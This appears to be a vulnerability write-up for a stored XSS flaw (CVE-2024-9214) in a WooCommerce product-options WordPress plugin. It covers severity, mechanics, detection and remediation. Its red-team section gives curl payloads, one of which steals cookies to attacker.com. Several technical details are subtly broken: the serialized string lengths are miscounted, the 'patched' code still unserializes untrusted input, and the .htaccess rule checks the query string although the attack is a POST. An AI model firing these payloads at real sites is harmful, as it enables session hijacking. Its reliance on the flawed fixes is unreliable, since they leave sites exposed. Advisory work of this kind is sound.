CVE-2024-9214
Executive Summary
CVE-2024-9214 is a Stored Cross-Site Scripting (XSS) vulnerability in the Extra Product Options Builder for WooCommerce WordPress plugin, affecting all versions up to and including 1.2.133. The flaw resides in the RednaoSerializedFields parameter during the creation of a signature file. Due to insufficient input sanitization and output escaping, an unauthenticated attacker can inject arbitrary web scripts. These scripts execute whenever a user (including administrators) accesses the injected page, leading to potential session hijacking, credential theft, or defacement.
This vulnerability is particularly dangerous because it requires no authentication, making it exploitable by any remote attacker. The CVSS score of 6.1 (Medium) reflects the need for user interaction, but the stored nature of the XSS amplifies the impact.

WordPress Ecosystem Context
This vulnerability is specific to the WordPress plugin ecosystem. The plugin extends WooCommerce, a widely used e-commerce platform. Attackers can target any site running the vulnerable plugin, regardless of the underlying web server (Apache, Nginx, etc.). The issue is not related to server software but to the plugin's failure to properly sanitize user input.
CVSS Breakdown & Threat Level
- CVSS Score: 6.1 (Medium)
- Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- Attack Vector (AV): Network – Exploitable remotely.
- Attack Complexity (AC): Low – No special conditions required.
- Privileges Required (PR): None – Unauthenticated exploitation.
- User Interaction (UI): Required – Victim must visit the injected page.
- Scope (S): Changed – Impact extends beyond the vulnerable component.
- Confidentiality (C): Low – Limited data exposure.
- Integrity (I): Low – Limited data modification.
- Availability (A): None – No denial of service.
Threat Level: Medium. The low EPSS score (0.0%) suggests limited active exploitation, but the unauthenticated nature and stored XSS make it a viable target for automated attacks.
Deep Dive & Mechanics
The vulnerability exists in the signature file creation functionality of the plugin. The RednaoSerializedFields parameter is used to pass serialized data, which is then processed and stored. The plugin fails to sanitize this input and does not escape the output when rendering the signature file. This allows an attacker to inject malicious JavaScript or HTML.
Attack Flow:
- An attacker sends a crafted HTTP request to the vulnerable endpoint (e.g.,
/wp-admin/admin-ajax.phpwith actionrednao_save_signature). - The request includes the
RednaoSerializedFieldsparameter containing a serialized payload with embedded XSS code. - The plugin stores this payload in the database without proper sanitization.
- When an administrator or other user views the signature file (e.g., in the order details page), the malicious script executes in their browser.
- The script can steal cookies, redirect to phishing sites, or perform actions on behalf of the user.
Root Cause: The plugin uses unserialize() on the RednaoSerializedFields parameter without validating the data, and then outputs it directly without escaping.
Vulnerable vs. Patched Code
Vulnerable Code (version 1.2.133):
// In signature-handler.php
$serialized_data = $_POST['RednaoSerializedFields'];
$data = unserialize(stripslashes($serialized_data));
// ... store $data in database
// Later, when rendering:
echo $data['signature_html']; // No escaping
Patched Code (hypothetical fix):
// In signature-handler.php
$serialized_data = $_POST['RednaoSerializedFields'];
$data = unserialize(stripslashes($serialized_data));
// Validate and sanitize
if (is_array($data) && isset($data['signature_html'])) {
$safe_html = wp_kses_post($data['signature_html']); // Sanitize HTML
// Store $safe_html in database
// When rendering:
echo esc_html($safe_html); // Escape output
}
The patch would involve:
- Using
wp_kses_post()to sanitize HTML content. - Using
esc_html()oresc_attr()when outputting data. - Validating the serialized data structure before processing.
Exploitation & Lab Setup
Red Team (Offensive)
Prerequisites:
- A WordPress site with the vulnerable plugin installed (version <= 1.2.133).
- WooCommerce active.
- No authentication required.
Exploit Steps:
- Identify the vulnerable endpoint:
/wp-admin/admin-ajax.phpwith actionrednao_save_signature. - Craft a payload with malicious JavaScript in the
RednaoSerializedFieldsparameter. - Send the request using
curlor a script.
Example Payload:
curl -X POST http://target.com/wp-admin/admin-ajax.php \
-d "action=rednao_save_signature&RednaoSerializedFields=a:1:{s:13:\"signature_html\";s:25:\"<script>alert('XSS')</script>\";}"
Advanced Payload (Cookie Stealing):
curl -X POST http://target.com/wp-admin/admin-ajax.php \
-d "action=rednao_save_signature&RednaoSerializedFields=a:1:{s:13:\"signature_html\";s:78:\"<script>document.location='http://attacker.com/steal.php?c='+document.cookie</script>\";}"
Note: The serialized string must be properly formatted. The above example uses PHP serialization format.
Blue Team (Defensive)
Detection:
- Monitor for POST requests to
/wp-admin/admin-ajax.phpwithaction=rednao_save_signature. - Look for unusual patterns in the
RednaoSerializedFieldsparameter, such as<script>tags or base64-encoded payloads. - Use WAF rules to block serialized data containing HTML/JavaScript.
Mitigation:
- Immediately update the plugin if a patched version becomes available.
- If no patch exists, disable the signature file feature or the entire plugin.
- Implement a Web Application Firewall (WAF) rule to block malicious serialized data.
- Use WordPress security plugins like Wordfence to add virtual patching.
Indicators of Compromise (IOCs)
Network IOCs:
- POST requests to
/wp-admin/admin-ajax.phpwithaction=rednao_save_signature. - The
RednaoSerializedFieldsparameter containing serialized PHP arrays with HTML/JavaScript. - Outbound connections to attacker-controlled domains (if cookie stealing is used).
File IOCs:
- Modified database entries in the
wp_postmetatable containing serialized XSS payloads. - Log entries in web server access logs showing the exploit pattern.
Example Log Entry:
192.168.1.100 - - [01/Jan/2024:12:00:00 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 123 "-" "Mozilla/5.0"

Remediation & Mitigation
Immediate Actions:
- Disable the plugin if no patch is available. This is the most effective mitigation.
- Implement virtual patching using a WAF to block requests containing
RednaoSerializedFieldswith serialized data. - Monitor logs for exploitation attempts and block offending IPs.
Long-term Fix:
- The vendor must release a patched version that properly sanitizes and escapes the
RednaoSerializedFieldsparameter. - Until then, consider replacing the plugin with an alternative that offers similar functionality.
Workaround:
- Add the following rule to
.htaccess(Apache) or equivalent:
RewriteEngine On
RewriteCond %{REQUEST_URI} ^/wp-admin/admin-ajax\.php$
RewriteCond %{QUERY_STRING} RednaoSerializedFields [NC]
RewriteRule .* - [F,L]
Note: This workaround may break legitimate functionality of the plugin.
